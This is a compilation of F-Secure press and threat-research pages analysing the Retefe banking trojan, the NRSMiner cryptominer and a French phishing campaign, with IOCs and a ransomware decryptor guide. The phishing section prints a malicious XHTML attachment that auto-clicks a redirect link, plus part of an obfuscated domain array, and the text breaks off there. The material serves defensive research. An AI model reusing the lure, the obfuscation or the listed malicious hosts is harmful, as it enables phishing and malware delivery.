#####EOF##### F-Secure PressRoom | United Kingdom
April 1, 2019

IoT threats: same hacks, new devices

F-Secure finds IoT threats and attacks are increasing, but rely on well-known security weaknesses

March 27, 2019

Continuous response needed to fight modern threats

F-Secure calls for more ‘response’ in managed detection and response solutions

March 19, 2019

F-Secure Radar wins Techconsult vulnerability management award

HELSINKI, Finland – March 19, 2019: Finnish cyber security company F-Secure continues to receive market recognition for its solutions, and this latest win is a first for the company. The accolade is the Professional User Rating: Security Solutions 2019 (PUR-S) Champion Award, given for Radar by German research and analyst firm Techconsult. F-Secure Radar is a PCI ASV certified, turnkey vulnerability scanning […]

March 12, 2019

Brexit-related Twitter mischief supported by global far right

F-Secure’s analysis of 24 million tweets exposes inorganic activity in Twitter’s Brexit conversations.

March 5, 2019

Attack traffic up by 32 percent in 2018

F-Secure’s research highlights increase in attacks but survey data shows companies still struggle with incident detection

February 21, 2019

F-Secure nets two AV-TEST Best Protection Awards in one go

F-Secure has won its sixth and seventh AV-TEST Institute’s Best Protection Award.

January 16, 2019

MWR InfoSecurity receives Princess Royal Training Award for Second Consecutive Year

MWR has received the Princess Royal Training Award for ongoing professional development.

December 11, 2018

Online shoppers more vulnerable to spam as the holidays inch closer

Research from F-Secure warns holiday shoppers of malicious emails disguised as delivery notifications

November 28, 2018

Multiple botnets disrupted as part of anti-fraud operation

Ad fraud ring used botnets to generate nearly 30 million dollars in fraudulent ad revenue

November 20, 2018

F-Secure boosts endpoint detection and response with unique on-demand elevate to experts

F-Secure Rapid Detection & Response backs up companies fighting intruders and helps overstretched cyber security personnel stop breaches automatically before they happen in one easy to use solution.

#####EOF##### Value-Driven Cybersecurity | News from the Lab

Value-Driven Cybersecurity

The Constructing an Alliance for Value-driven Cybersecurity (CANVAS) project launched roughly two years ago with F-Secure as a member. The goal of the EU project is “to unify technology developers with legal and ethical scholars and social scientists to approach the challenge of how cybersecurity can be aligned with European values and fundamental rights.” (That’s a mouthful, right?) Basically, Europe wants to align cybersecurity and human rights.

If you don’t see the direct connection between human rights and cybersecurity, consider this: the EU’s General Data Protection Regulation (GDPR) is human rights law. Everybody’s data is covered by GDPR. Meanwhile, in the USA… California’s legislature is working on a data privacy bill, and there’s now a growing number of lobbyists fighting over how to define just what a “consumer” is. So, in the USA, data protection is not human rights law, it’s consumer protection law (and there are likely to be plenty of legal loopholes). And in the end, not everybody’s data will be covered.

So there you go, the EU sees cybersecurity as something that affects everybody, and the CANVAS project is part of its efforts to ensure that the rights of all are respected.

As part of the project, on May 28th & 29th of this year, F-Secure organized a workshop at our HQ on the ethics-related challenges that cybersecurity companies and cooperating organizations face in their research and operations. Which is to say: what considerations must cybersecurity companies and related organizations take into account to be upstanding citizens?

The theme made for excellent workshop material. Also, the weather was uncharacteristically cooperative (we picked May to increase the odds in our favor), the presentations were great, and the resulting discussions were lively.

Topics included:

  • Investigation of nation-state cyber operations.
  • Vulnerability disclosure and the creation of proof-of-concept code for: public awareness; incentivizing vulnerability fixing efforts; security research; penetration testing; and other purposes.
  • Control of personal devices. Backdoors and use of government sponsored “malware” as possible countermeasures to the ubiquitous use of encryption.
  • Ethics, artificial intelligence, and cybersecurity.
  • Assisting law enforcement agencies without violating privacy, a CERT viewpoint.
  • Targeted attacks and ethical choices arising due to attacker and defender operations.
  • Privacy and its assurance through data economy and encryption, balancing values with financial interests of companies.

The workshop participants included a mix of cybersecurity practitioners and representatives from policy focused organizations. The Chatham House rule (in particular, no recording policy) was used to allow for free and open discussion.

So, in that spirit, names and talks won’t be included in the text of this post. But, for those who are interested in reading more, approved bios and presentation summaries can be found in the workshop report (final draft).

Next up on the CANVAS agenda for F-Secure?

CISO Erka Koivunen will be in Switzerland next week (September 5th & 6th) at The Bern University of Applied Sciences attending a workshop on: Cybersecurity Challenges in the Government Sphere – Ethical, Legal and Technical Aspects.

Erka has worked in government in the past, so his perspective covers both sides of the fence. His presentation is titled: Serve the customer by selling… tainted goods?! Why F-Secure too will start publishing Transparency Reports.

#####EOF##### Retefe Banking Trojan Targets Both Windows And Mac Users | News from the Lab

Retefe Banking Trojan Targets Both Windows And Mac Users

Based on our telemetry, customers (mainly in Switzerland and Germany) are being targeted by a Retefe banking trojan campaign that uses both Windows and macOS-based attachments. Its massive spam run started earlier this week and peaked yesterday afternoon (Helsinki time).

TrendMicro did a nice writeup on this threat earlier this week. The new campaign, which just started yesterday, introduced some updates to the malware payload.

Instead of storing the installation strings and Onion proxy domain in the binary as plain text, the authors made an effort to hide the interesting strings by XORing them with 0xFF.

Original encrypted…

…and decrypted!
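A scheme like this is trivially reversible, since XOR with 0xFF flips every bit and applying it twice restores the original. A minimal Python sketch (the sample bytes are hypothetical, not taken from the actual binary):

```python
def xor_ff(data: bytes) -> bytes:
    # XOR each byte with 0xFF; the operation is its own inverse,
    # so the same function both "encrypts" and "decrypts".
    return bytes(b ^ 0xFF for b in data)

# Hypothetical plaintext standing in for an Onion proxy domain:
plain = b"example.onion"
encrypted = xor_ff(plain)
assert encrypted != plain
assert xor_ff(encrypted) == plain
```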

The spam message looks like it’s coming from “Mein A1” (info@ addresses at various .ch domains) with subject lines such as “Ihre Rechnung #123456-AB123456 vom 13/07/2017”. The mail itself is signed by A1 Telekom Austria AG. The mail contains two attachments: a zipped Mach-O application, and a .xlsx or .docx document file. The first attachment targets macOS systems, whereas the document file installs the malware on Windows systems.

The mail itself doesn’t give the victim any social engineering cues as to which file to open; moreover, having an Austrian telecom company send Swiss International Airlines-related documents is probably more confusing than intriguing.

The text explains that double-clicking opens a larger view of the image – but actually, it runs the malware.

Though the malware mainly targets Switzerland (.ch domains), we also found a target configuration for Austrian banks.

List of Austrian-based targets:

‘*bankaustria.at’, ‘*.bawagpsk.com’, ‘*raiffeisen.at’, ‘*.bawag.com’, ‘www.banking.co.at’, ‘*oberbank.at’, ‘www.oberbank-banking.at’, ‘*.easybank.at’

List of Swiss-based targets:

‘*.postfinance.ch’, ‘cs.directnet.com’, ‘*akb.ch’, ‘*ubs.com’, ‘tb.raiffeisendirect.ch’, ‘*bkb.ch’, ‘*lukb.ch’, ‘*zkb.ch’, ‘*onba.ch’, ‘*gkb.ch’, ‘*bekb.ch’, ‘*zugerkb.ch’, ‘*bcge.ch’, ‘*raiffeisen.ch’, ‘*credit-suisse.com’, ‘*.clientis.ch’, ‘clientis.ch’, ‘*bcvs.ch’, ‘*.cic.ch’, ‘cic.ch’, ‘*baloise.ch’, ‘ukb.ch’, ‘*.ukb.ch’, ‘urkb.ch’, ‘*.urkb.ch’, ‘*eek.ch’, ‘*szkb.ch’, ‘*shkb.ch’, ‘*glkb.ch’, ‘*nkb.ch’, ‘*owkb.ch’, ‘*cash.ch’, ‘*bcf.ch’, ‘ebanking.raiffeisen.ch’, ‘*bcv.ch’, ‘*juliusbaer.com’, ‘*abs.ch’, ‘*bcn.ch’, ‘*blkb.ch’, ‘*bcj.ch’, ‘*zuercherlandbank.ch’, ‘*valiant.ch’, ‘*wir.ch’, ‘*bankthalwil.ch’, ‘*piguetgalland.ch’, ‘*triba.ch’, ‘*inlinea.ch’, ‘*bernerlandbank.ch’, ‘*bancasempione.ch’, ‘*bsibank.com’, ‘*corneronline.ch’, ‘*vermoegenszentrum.ch’, ‘*gobanking.ch’, ‘*slbucheggberg.ch’, ‘*slfrutigen.ch’, ‘*hypobank.ch’, ‘*regiobank.ch’, ‘*rbm.ch’, ‘*hbl.ch’, ‘*ersparniskasse.ch’, ‘*ekr.ch’, ‘*sparkasse-dielsdorf.ch’, ‘*eki.ch’, ‘*bankgantrisch.ch’, ‘*bbobank.ch’, ‘*alpharheintalbank.ch’, ‘*aekbank.ch’, ‘*acrevis.ch’, ‘*credinvest.ch’, ‘*bancazarattini.ch’, ‘*appkb.ch’, ‘*arabbank.ch’, ‘*apbank.ch’, ‘*notenstein-laroche.ch’, ‘*bankbiz.ch’, ‘*bankleerau.ch’, ‘*btv3banken.ch’, ‘*dcbank.ch’, ‘*bordier.com’, ‘*banquethaler.com’, ‘*bankzimmerberg.ch’, ‘*bbva.ch’, ‘*bankhaus-jungholz.ch’, ‘*sparhafen.ch’, ‘*banquecramer.ch’, ‘*banqueduleman.ch’, ‘*bcpconnect.com’, ‘*bil.com’, ‘*vontobel.com’, ‘*pbgate.net’, ‘*bnpparibas.com’, ‘*ceanet.ch’, ‘*ce-riviera.ch’, ‘*cedc.ch’, ‘*cmvsa.ch’, ‘*ekaffoltern.ch’, ‘*glarner-regionalbank.ch’, ‘*cen.ch’, ‘*cbhbank.com’, ‘*coutts.com’, ‘*cimbanque.net’, ‘*cembra.ch’, ‘*commerzbank.com’, ‘*dominickco.ch’, ‘*efginternational.com’, ‘*exane.com’, ‘*falconpb.com’, ‘*gemeinschaftsbank.ch’, ‘*frankfurter-bankgesellschaft.com’, ‘*globalance-bank.com’, ‘*ca-financements.ch’, ‘*hsbcprivatebank.com’, ‘*leihkasse-stammheim.ch’, ‘*incorebank.ch’, ‘*lienhardt.ch’, ‘*mmwarburg.ch’, ‘*maerki-baumann.ch’, ‘*mirabaud.com’, ‘*nordea.ch’, 
‘*pbihag.ch’, ‘*rahnbodmer.ch’, ‘*mybancaria.ch’, ‘*reyl.com’, ‘*saanenbank.ch’, ‘*sebgroup.com’, ‘*slguerbetal.ch’, ‘*bankslm.ch’, ‘*neuehelvetischebank.ch’, ‘*slr.ch’, ‘*slwynigen.ch’, ‘*sparkasse.ch’, ‘*umtb.ch’, ‘*trafina.ch’, ‘*ubp.com’
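The entries in these target lists look like shell-style wildcard patterns. Assuming those semantics (the trojan’s actual matching logic is not documented here), checking whether a visited hostname is targeted can be sketched as:

```python
from fnmatch import fnmatch

# A few entries taken from the Austrian target list above.
targets = ["*bankaustria.at", "*.easybank.at", "www.banking.co.at"]

def is_targeted(hostname: str) -> bool:
    # Assumes '*' behaves like a shell glob, matching any prefix/suffix.
    return any(fnmatch(hostname, pattern) for pattern in targets)

assert is_targeted("online.bankaustria.at")
assert is_targeted("www.banking.co.at")
assert not is_targeted("example.com")
```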

Though the Retefe banking trojan has previously operated in other European countries, such as Sweden and the UK, no countries other than Switzerland and Austria were targeted in this campaign.

As a note of historical interest, here’s a list of UK-based banks that were targeted in June 2016:

‘*barclays.co.uk’, ‘*natwest.com’, ‘*nwolb.com’, ‘hsbc.co.uk’, ‘www.hsbc.co.uk’,’*business.hsbc.co.uk’, ‘*santander.co.uk’, ‘*rbsdigital.com’, ‘onlinebusiness.lloydsbank.co.uk’,’*cahoot.com’,’*smile.co.uk’, ‘*co-operativebank.co.uk’, ‘if.com’, ‘*.if.com’, ‘*ulsterbankanytimebanking.co.uk’,’*sainsburysbank.co.uk’, ‘*tescobank.com’

IOCs:

  • https: //www[.]dropbox[.]com/s/azkkyzzo41tk84i/FzF7sEBlz128859.exe?dl=1
    https: //www[.]dropbox[.]com/s/96q0qkrusk5gkp6/HwJoS9VDWh570254.exe?dl=1
  • 6aaoqcl2leiptpvn.onion
    dwylpqieagmgtyjl.onion
    dzi752gjsjbsm6pl.onion
    aztqlm4tslmpgkau.onion
    oq47ekl6jzybts33.onion
  • 2cac780f6de5a8acc3506586c06b1218c33b21b0
    9067894655fecc5e22204488672aa08187f52456
    55666326365bcdc57d2e2ce03e537409281140db
    8a55ad699af46e8dabc8ff986c249ba19dd57a9f
    1072112bd23ef35421e49b7927fcc6b5e3703660
    304011d12d7c2fb6640afffd6e751efeb822b1f8
    b4dddd358d5ca61e511a7f0a6ab2d62cfd7acaf3
    272b564ee9dee4e5748b11e2570ba99be403be52
    6cf4e22806d88a97a8a3b02e7c6d9ae480f253e6
    d26a3b093fcc12356fedf03ef5b4341435148881
    d4ec8873bef322358b23c4acda15dd9660d4164d
    2e3dfc1b5e25e835e0a0d0bb6cdc761c84df49e2
    637889f399620c8558d08619a98f30c55e64eb66
    9d9e4007e9df7cd8dabc57d8492797b4d445d2c8
    a7cab82e0cae7b62c3e04664c30108cebc08c3c9


#####EOF##### Mira Decryptor

Mira Decryptor

Decrypt files that were encrypted by Mira ransomware.


F-Secure Decryptor for Mira Ransomware

About the Tool

F-Secure Decryptor for Mira Ransomware helps you decrypt files that were encrypted by the ransomware known as Mira.

It is important to run the tool on the specific computer where the files were originally encrypted, because the recovery key for each file is calculated from the computer on which the files were encrypted.

This tool requires Administrator rights in order to execute properly. 

NOTE: This is an F-Secure Labs support tool. It is provided "as is" without warranty or product support.

Download Mira Decryptor

 

Instructions

  1. Extract the package "F-SecureDecryptorForMiraRansomware.zip" to any folder. The password is "novirus".
  2. In the folder where the tool was extracted, open up a command line with "Administrator" privileges. Here's an example how:
    a. Press the "Windows" key + "R" together to open up a Run dialogue
    b. Enter this command: <runas /user:Administrator "%comspec% /K \"cd %~dp0 \" ">
    c. Change "/user:Administrator" to the actual administrator account of the machine as necessary
    d. Enter the password of the Administrator user
  3. Run the tool "F-SecureDecryptorForMiraRansomware.exe"
  4. The tool prints usage information and exits if no arguments are provided:
    a. /decrypt - Search for encrypted files and decrypt them
    b. /nolog - Suppress log file creation
    c. /nobackup - Suppress backup creation
    d. /accepteult - Suppress the display of the license
  5. The tool automatically searches the system for encrypted files and decrypts them.
A video of the tool in action is available at https://www.youtube.com/watch?v=WhTKSTQCGqM.

 

#####EOF##### Online security and privacy products | F-Secure

The best protection in the world

F-Secure SAFE is award-winning internet security for all devices. Try now for free!

F-Secure TOTAL

F-Secure TOTAL

  • Internet security, VPN and password management for all devices
  • Manage all computers and mobile devices from one account
  • Try free for 30 days
F-Secure SAFE

F-Secure SAFE

  • Award-winning internet security for all devices
  • Protection against viruses, ransom­ware and unsafe websites
  • Try free for 30 days
F-Secure FREEDOME VPN

F-Secure FREEDOME VPN

  • Become hidden and anonymous online
  • Access geo-blocked content
  • Stay safe on public Wi-Fi

Cyber Security and Privacy Hub

Explore tips on how you can keep your devices safe, your privacy protected and your internet experience smooth.

#####EOF##### NRSMiner updates to newer version | News from the Lab

NRSMiner updates to newer version

More than a year after the world first saw the Eternal Blue exploit in action during the May 2017 WannaCry outbreak, we are still seeing unpatched machines in Asia being infected by malware that uses the exploit to spread. Starting in mid-November 2018, our telemetry reports indicate that the newest version of the NRSMiner cryptominer, which uses the Eternal Blue exploit to propagate to vulnerable systems within a local network, is actively spreading in Asia. Most of the infected systems seen are in Vietnam.


November-December 2018 telemetry statistics for NRSMiner, by country

In addition to downloading a cryptocurrency miner onto an infected machine, NRSMiner can download updated modules and delete the files and services installed by its own previous versions.

This post provides an analysis of how the latest version of NRSMiner infects a system and finds new vulnerable targets to infect. Recommendations for mitigation measures, IOCs and SHA1s are listed at the end of the post.

 

How NRSMiner spreads

There are two methods by which a system can be infected by the newest version of NRSMiner:

  • By downloading the updater module onto a system that is already infected with a previous version of NRSMiner, or
  • By exploitation, if the system is unpatched against MS17-010 and another system within the intranet has been infected by NRSMiner.

 

Method 1: Infection via the Updater module

First, a system that has been infected with an older version of NRSMiner (and has the wmassrv service running) will connect to tecate[.]traduires[.]com to download an updater module to the %systemroot%\temp folder as tmp[xx].exe, where [xx] is the return value of the GetTickCount() API.
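The tick-count naming scheme can be illustrated with a short sketch; Python’s monotonic clock stands in for the Windows GetTickCount() API here, so the numbers themselves are not meaningful:

```python
import time

def dropped_filename(prefix: str = "tmp") -> str:
    # The malware names dropped files tmp[xx].exe (and later
    # WUDHostUpgrade[xx].exe), where [xx] is the return value of
    # GetTickCount(); time.monotonic() is a cross-platform stand-in.
    tick = int(time.monotonic() * 1000)
    return f"{prefix}{tick}.exe"

print(dropped_filename())                  # e.g. tmp123456.exe
print(dropped_filename("WUDHostUpgrade"))  # e.g. WUDHostUpgrade123456.exe
```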

When this updater module is executed, it downloads another file to the same folder from one of a series of hard-coded IP addresses:


List of IP addresses found in different updater module files

The downloaded file, /x86 or /x64, is saved in the %systemroot%\temp folder as WUDHostUpgrade[xx].exe; again, [xx] is the return value of the GetTickCount() API.

WUDHostUpgrade[xx].exe

The WUDHostUpgrade[xx].exe first checks the mutex {502CBAF5-55E5-F190-16321A4} to determine whether the system has already been infected with the latest NRSMiner version. If so, WUDHostUpgrade[xx].exe deletes itself. Otherwise, it deletes the files MarsTraceDiagnostics.xml, snmpstorsrv.dll and MgmtFilterShim.ini.

Next, the module extracts the following files from its resource section (BIN directory) to the %systemroot%\system32 or %systemroot%\sysWOW64 folder: MarsTraceDiagnostics.xml and snmpstorsrv.dll.

It then copies the values for the CreationTime, LastAccessTime and LastWritetime properties from svchost.exe and updates the same properties for the MarsTraceDiagnostics.xml and snmpstorsrv.dll files with the copied values.

Finally, the WUDHostUpgrade[xx].exe installs a service named snmpstorsrv, with snmpstorsrv.dll registered as servicedll. It then deletes itself.

 


Pseudo-code for WUDHostUpgradexx.exe’s actions

 

Snmpstorsrv service

The newly-created Snmpstorsrv service starts under “svchost.exe -k netsvcs” and loads the snmpstorsrv.dll file, which creates multiple threads to perform several malicious activities.


Snmpstorsrv service’s activities

The service first creates a file named MgmtFilterShim.ini in the %systemroot%\system32 folder, writes ‘+’ in it and modifies its CreationTime, LastAccessTime and LastWritetime properties to have the same values as svchost.exe.
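The timestamp-cloning step (copying svchost.exe’s times so the dropped file blends in) can be sketched cross-platform; NTFS CreationTime has no direct POSIX equivalent, so only access and modification times are shown, and the temp files here are stand-ins for svchost.exe and MgmtFilterShim.ini:

```python
import os
import tempfile

# 'source' plays the role of svchost.exe, 'dropped' the dropped file.
source = tempfile.NamedTemporaryFile(delete=False)
source.close()
dropped = tempfile.NamedTemporaryFile(delete=False)
dropped.close()

st = os.stat(source.name)
# Clone access and modification times onto the dropped file so that a
# casual inspection shows the same timestamps as the legitimate binary.
os.utime(dropped.name, (st.st_atime, st.st_mtime))

assert int(os.stat(dropped.name).st_mtime) == int(st.st_mtime)
```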

Next, the Snmpstorsrv service extracts malicious URLs and the cryptocurrency miner’s configuration file from MarsTraceDiagnostics.xml.


Malicious URLs and miner configuration details in the MarsTraceDiagnostics.xml file

On a system that is already infected with an older version of NRSMiner, the malware deletes all components of that older version before installing the newer one. To remove the immediately prior version, the newest version refers to a list of services, tasks and files found as strings in the snmpstorsrv.dll file; to remove all older versions, it refers to a list found in the MarsTraceDiagnostics.xml file.


List of services, tasks, files and folders to be deleted

After all the artifacts of the old versions are deleted, the Snmpstorsrv service checks for any updates to the miner module by connecting to:

  • reader[.]pamphler[.]com/resource
  • handle[.]pamphler[.]com/modules.dat

If an updated miner module is available, it is downloaded and written into the MarsTraceDiagnostics.xml file. Once the new module is downloaded, the old miner file in %systemroot%\system32\TrustedHostex.exe is deleted. The new miner is decompressed in memory and the newly extracted miner configuration data is written into it.

This newly updated miner file is then injected into the svchost.exe to start crypto-mining. If the injection fails, the service instead writes the miner to %systemroot%\system32\TrustedHostex.exe and executes it.


The miner decompressed in memory

Next, the Snmpstorsrv service decompresses the wininit.exe file and injects it into svchost.exe. If the injection fails, it writes wininit.exe to %systemroot%\AppDiagnostics\wininit.exe and executes it. The service also opens port 60153 and starts listening.

In two other threads, the service sends out details about the infected system to the following sites:

  • pluck[.]moisture[.]tk – MAC address, IP Address, System Name, Operating System information
  • jump[.]taucepan[.]com – processor and memory specific information


System information forwarded to remote sites

Based on the information sent, a new updater file will be downloaded and executed, which will perform the same activities as described in “Updater Module” section above. This updater module can be used to infect systems with any new upcoming version of NRSMiner.

 

Method 2: Infection via Wininit.exe and Exploit

In the latest NRSMiner version, wininit.exe is responsible for handling its exploitation and propagation activities. Wininit.exe decompresses the zipped data in %systemroot%\AppDiagnostics\blue.xml and unzips files to the AppDiagnostics folder. Among the unzipped files is one named svchost.exe, which is the Eternalblue – 2.2.0 exploit executable. It then deletes the blue.xml file and writes 2 new files named x86.dll and x64.dll in the AppDiagnostics folder.

Wininit.exe scans the local network on TCP port 445 to search for other accessible systems. After the scan, it executes the Eternalblue executable file to exploit any vulnerable systems found. Exploit information is logged in the process1.txt file.
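The scan itself boils down to probing TCP port 445 across the local network. A defender-side sketch of the same check (the timeout value is arbitrary, and this is an illustration, not the malware’s code):

```python
import socket

def smb_port_open(host: str, timeout: float = 0.5) -> bool:
    # Returns True if the host accepts a TCP connection on port 445 (SMB),
    # i.e. it would be a candidate target for the EternalBlue exploit.
    try:
        with socket.create_connection((host, 445), timeout=timeout):
            return True
    except OSError:
        return False

# 203.0.113.1 is a reserved TEST-NET address and should never answer.
print(smb_port_open("203.0.113.1", timeout=0.2))  # False
```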

If the vulnerable system is successfully exploited, Wininit.exe then executes spoolsv.exe, which is the DoublePulsar – 1.3.1 executable file. This file installs the DoublePulsar backdoor onto the exploited system. Depending on the operating system of the target, either the x86.dll or x64.dll file is then transferred by Wininit.exe and gets injected into the targeted system’s lsass.exe by the spoolsv.exe backdoor.


Propagation method

x86.dll/x64.dll

This file creates a socket connection and retrieves the MarsTraceDiagnostics.xml file (in the %systemroot%\system32 folder) from the parent infected system. It extracts snmpstorsrv.dll, then creates and starts the Snmpstorsrv service on the newly infected system, which repeats the whole infection cycle and finds other vulnerable machines.

Miner module

NRSMiner uses the XMRig Monero CPU miner to generate units of the Monero cryptocurrency. It runs with one of the following parameters:


Miner parameters

The following are the switches used in the parameters:

  • -o, --url=URL           URL of mining server
  • -u, --user=USERNAME     username for mining server
  • -p, --pass=PASSWORD     password for mining server
  • -t, --threads=N         number of miner threads
  • --donate-level=N        donate level, default 5% (5 minutes in 100 minutes)
  • --nicehash              enable nicehash.com support

 

Detection

F-Secure products currently detect and block all variants of this malware, with a variety of detections.

Mitigation recommendations

The following measures can be taken to mitigate the exploitation of the vulnerability targeted by Eternal Blue and prevent an infection from spreading in your environment.

  • For F-Secure products:
    • Ensure that the F-Secure security program is using the latest available database updates.
    • Ensure DeepGuard is turned on in all your corporate endpoints, and F-Secure Security Cloud connection is enabled.
    • Ensure that the F-Secure firewall is turned on with its default settings. Alternatively, configure your firewall to block inbound and outbound port 445 traffic within the organization to prevent the malware from spreading within the local network.
  • For Windows:
    • Use Software Updater or any other available tool to identify endpoints without the Microsoft-issued security fix (4013389) and patch them immediately.
    • Apply the relevant security patches for any Windows systems under your administration based on the guidance given in Microsoft’s Customer Guidance for WannaCrypt attacks.
    • If you are unable to patch immediately, we recommend that you disable SMBv1 with the steps documented in Microsoft Knowledge Base Article 2696547 to reduce the attack surface.

 

Indicators of compromise (IOCs):

SHA1s:

32ffc268b7db4e43d661c8b8e14005b3d9abd306 - MarsTraceDiagnostics.xml
07fab65174a54df87c4bc6090594d17be6609a5e - snmpstorsrv.dll
abd64831ad85345962d1e0525de75a12c91c9e55 - AppDiagnostics folder (zip)
4971e6eb72c3738e19c6491a473b6c420dde2b57 - Wininit.exe
e43c51aea1fefb3a05e63ba6e452ef0249e71dd9 - tmpxx.exe
327d908430f27515df96c3dcd180bda14ff47fda - tmpxx.exe
37e51ac73b2205785c24045bc46b69f776586421 - WUDHostUpgradexx.exe
da673eda0757650fdd6ab35dbf9789ba8128f460 - WUDHostUpgradexx.exe
ace69a35fea67d32348fc07e491080fa635cc859 - WUDHostUpgradexx.exe
890377356f1d41d2816372e094b4e4687659a96f - WUDHostUpgradexx.exe
7f1f63feaf79c5f0a4caa5bbc1b9d76b8641181a - WUDHostUpgradexx.exe
9d4d574a01aaab5688b3b9eb4f3df2bd98e9790c - WUDHostUpgradexx.exe
9d7d20e834b2651036fb44774c5f645363d4e051 - x64.dll
641603020238a059739ab4cd50199b76b70304e1 - x86.dll

IP addresses:

167[.]179.79.234
104[.]248.72.247
172[.]105.229.220
207[.]148.110.212
149[.]28.133.197
167[.]99.172.78
181[.]215.176.23
38[.]132.111.23
216[.]250.99.33
103[.]103.128.151

URLs:

c[.]lombriz[.]tk
state[.]codidled[.]com
null[.]exhauest[.]com
take[.]exhauest[.]com
junk[.]soquare[.]com
loop[.]sawmilliner[.]com
fox[.]weilders[.]com
asthma[.]weilders[.]com
reader[.]pamphler[.]com
jump[.]taucepan[.]com
pluck[.]moisture[.]tk
handle[.]pamphler[.]com
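The IOCs above are defanged with [.] so they cannot be clicked or resolved by accident. A tiny helper to restore them before feeding a blocklist:

```python
def refang(ioc: str) -> str:
    # Reverses the common [.] defanging used in the lists above.
    return ioc.replace("[.]", ".")

assert refang("reader[.]pamphler[.]com") == "reader.pamphler.com"
assert refang("167[.]179.79.234") == "167.179.79.234"
```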


#####EOF##### Phishing Campaign targeting French Industry | News from the Lab

Phishing Campaign targeting French Industry

We have recently observed an ongoing phishing campaign targeting the French industry. Among the targets are organizations involved in chemical manufacturing, aviation, automotive, banking, industry software providers, and IT service providers. Since the beginning of October 2018, we have seen multiple phishing emails that follow a similar pattern, use similar indicators, and show quickly evolving obfuscation over the course of the campaign. This post gives a quick look at how the campaign has evolved, what it is about, and how you can detect it.

Phishing emails

The phishing emails usually refer to some document that could either be an attachment or could supposedly be obtained by visiting the link provided. The use of the French language here appears to be native and very convincing.

The subject of the email follows the prefix of the attachment name. The attachments can be HTML or PDF files, usually named “document“, “preuves“, or “fact“, optionally followed by an underscore and six digits. Here are some of the attachment names we have observed:

  • fact_395788.xht
  • document_773280.xhtml
  • 474362.xhtml
  • 815929.htm
  • document_824250.html
  • 975677.pdf
  • 743558.pdf
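The naming pattern above is regular enough to express as a heuristic. The regex below is my own illustration derived from the observed names, not F-Secure’s actual detection logic:

```python
import re

# Optional "document"/"preuves"/"fact" prefix with underscore,
# six digits, and an HTML- or PDF-style extension.
NAME = re.compile(r'^(?:(?:document|preuves|fact)_)?\d{6}\.(?:xht|xhtml|htm|html|pdf)$')

observed = ["fact_395788.xht", "document_773280.xhtml", "474362.xhtml",
            "815929.htm", "document_824250.html", "975677.pdf", "743558.pdf"]
for name in observed:
    assert NAME.match(name), name
```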

Here’s example content from an XHTML attachment dated the 15th of November:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<meta content="UTF-8" />
</head>
<body onload='document.getElementById("_y").click();'>
<h1>
<a id="_y" href="https://t[.]co/8hMB9xwq9f?540820">Lien de votre document</a>
</h1>
</body>
</html>
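Note the onload handler: the page clicks its own link as soon as it loads, sending the victim straight to the redirect chain. One simple heuristic for such attachments — my own illustration, not F-Secure’s detection logic — is to flag a body element whose onload handler immediately clicks an element:

```python
import re

# Flags <body onload=...> attributes that invoke .click() directly.
AUTOCLICK = re.compile(r'<body[^>]+onload=[^>]*\.click\(\)', re.IGNORECASE)

sample = "<body onload='document.getElementById(\"_y\").click();'>"
assert AUTOCLICK.search(sample)
assert not AUTOCLICK.search("<body><p>hello</p></body>")
```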

 

Evolution of the campaign

The first phishing emails observed at the beginning of October contained unobfuscated payload addresses. For example:

  • hxxp://piecejointe[.]pro/facture/redirect[.]php
  • hxxp://mail-server-zpqn8wcphgj[.]pw?client=XXXXXX

These links appeared inside HTML/XHTML/HTM attachments, or simply as links in the email body. The attachment names used were mostly document_[randomized number].xhtml.

Towards the end of October, these payload addresses were further obfuscated by putting them behind redirects. The authors developed a simple piece of JavaScript to obfuscate a set of .pw domains.

var _0xa4d9=["\x75\x71\x76\x6B\x38\x66\x74\x75\x77\x35\x69\x74\x38\x64\x73\x67\x6C\x63\x7A\x2E\x70\x77",
"\x7A\x71\x63\x7A\x66\x6E\x32\x6E\x6E\x6D\x75\x65\x73\x68\x38\x68\x74\x79\x67\x2E\x70\x77",
"\x66\x38\x79\x33\x70\x35\x65\x65\x36\x64\x6C\x71\x72\x37\x39\x36\x33\x35\x7A\x2E\x70\x77",
"\x65\x72\x6B\x79\x67\x74\x79\x63\x6F\x6D\x34\x66\x33\x79\x61\x34\x77\x69\x71\x2E\x70\x77",
"\x65\x70\x72\x72\x39\x71\x79\x32\x39\x30\x65\x62\x65\x70\x6B\x73\x6D\x6B\x62\x2E\x70\x77",
"\x37\x62\x32\x64\x75\x74\x62\x37\x76\x39\x34\x31\x34\x66\x6E\x68\x70\x36\x63\x2E\x70\x77",
"\x64\x69\x6D\x76\x72\x78\x36\x30\x72\x64\x6E\x7A\x36\x63\x68\x6C\x77\x6B\x65\x2E\x70\x77",
"\x78\x6D\x76\x6E\x6C\x67\x6B\x69\x39\x61\x39\x39\x67\x35\x6B\x62\x67\x75\x65\x2E\x70\x77",
"\x62\x72\x75\x62\x32\x66\x77\x64\x39\x30\x64\x38\x6D\x76\x61\x70\x78\x6E\x6C\x2E\x70\x77",
"\x68\x38\x39\x38\x6A\x65\x32\x68\x74\x64\x64\x61\x69\x38\x33\x78\x63\x72\x37\x2E\x70\x77",
"\x6C\x32\x6C\x69\x69\x75\x38\x79\x64\x7A\x6D\x64\x66\x30\x31\x68\x69\x63\x72\x2E\x70\x77",
"\x63\x79\x6B\x36\x6F\x66\x6D\x75\x6E\x6C\x35\x34\x72\x36\x77\x6B\x30\x6B\x74\x2E\x70\x77",
"\x7A\x78\x70\x74\x76\x79\x6F\x64\x6A\x39\x35\x64\x77\x63\x67\x6B\x6C\x62\x77\x2E\x70\x77",
"\x35\x65\x74\x67\x33\x6B\x78\x6D\x69\x78\x67\x6C\x64\x73\x78\x73\x67\x70\x65\x2E\x70\x77",
"\x38\x35\x30\x6F\x6F\x65\x70\x6F\x6C\x73\x69\x71\x34\x6B\x71\x6F\x70\x6D\x65\x2E\x70\x77",
"\x6F\x6D\x63\x36\x75\x32\x6E\x31\x30\x68\x38\x6E\x61\x71\x72\x30\x61\x70\x68\x2E\x70\x77",
"\x63\x30\x7A\x65\x68\x62\x74\x38\x6E\x77\x67\x6F\x63\x35\x63\x6E\x66\x33\x30\x2E\x70\x77",
"\x68\x36\x6A\x70\x64\x6B\x6E\x7A\x76\x79\x63\x61\x36\x6A\x67\x33\x30\x78\x74\x2E\x70\x77",
